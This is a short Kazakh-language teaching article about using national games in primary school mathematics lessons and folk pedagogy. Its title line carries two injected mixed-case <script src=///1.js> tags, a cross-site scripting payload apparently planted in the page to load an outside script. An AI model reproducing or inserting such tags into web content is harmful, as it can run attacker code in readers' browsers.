Математика сабағында қолданылатын ұлттық ойындардың түрлері<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
30.10.2020
Дидактикалық ойындарды оқытуды ұйымдастыру тәсіл ретінде пайдаланудың бірінші әдістемелік ерекшелігі – математиканы оқытуда сабақта және сабақтан тыс жұмыстарда кез-келген кіші жастағы балаларға пайдалануға болатындығы, – деп тұжырымдаймыз. Мысалы, «Бәйге», «Баспалдақ», «Ақ сүйек», «Жамбы ату», т.б. ойындарының математикалық мазмұнын оқылатын тақырыптарға сәйкестендіріп пайдалануға болады.
Ғасырлар бойы даналығымен, өміршеңдігімен дәлелденген халықтық педагогика үлгілері тәрбиенің қайнар көзі болып табылады. Қаншама заман өтсе де маңызын жоймаған халықтың педагогикалық мұрасын тәлім тәрбиенің түп қазығына айналдыру ата ананың да, мектеп мұғалімдерінің де асыл борышы. Баланың ақыл ой, зердесін тәрбиелеуде атам заманнан жиналған мол тәжірбиесі ғасырлар бойы сараланып, ұлттық тәлім тәрбие дәстүрімен тығыз байланыста дамып, ұрпақтан ұрпаққа жалғасып отыр.
Ойын баланың алдынан өмірдің есігін ашып, шығармашылығын оятып, логикасын жетілдіріп, бүкіл өміріне ұштаса береді, фольклор қазынасы баланың білімділік қабілетін дамытуға көмектеседі.
Халық педагогикасының ішіндегі қазақтың ұлттық ойындары: “Алтын сақа”, “Бәйге”, “Көкпар”, “Сақина салмақ”, “Бес тас”, “Тоғыз құмалақ”, “Күміс алу”, “Ақсүйек” тағы басқалары ата бабамыздан бізге жеткен байлығымыз, асыл қазынамыз. Сондықтан оны үйренудің, күнделікті тұрмысқа пайдаланудың заманымызға сай ұрпақ тәрбиелеуге пайдасы орасан зор.
Сейдахметова Р. К.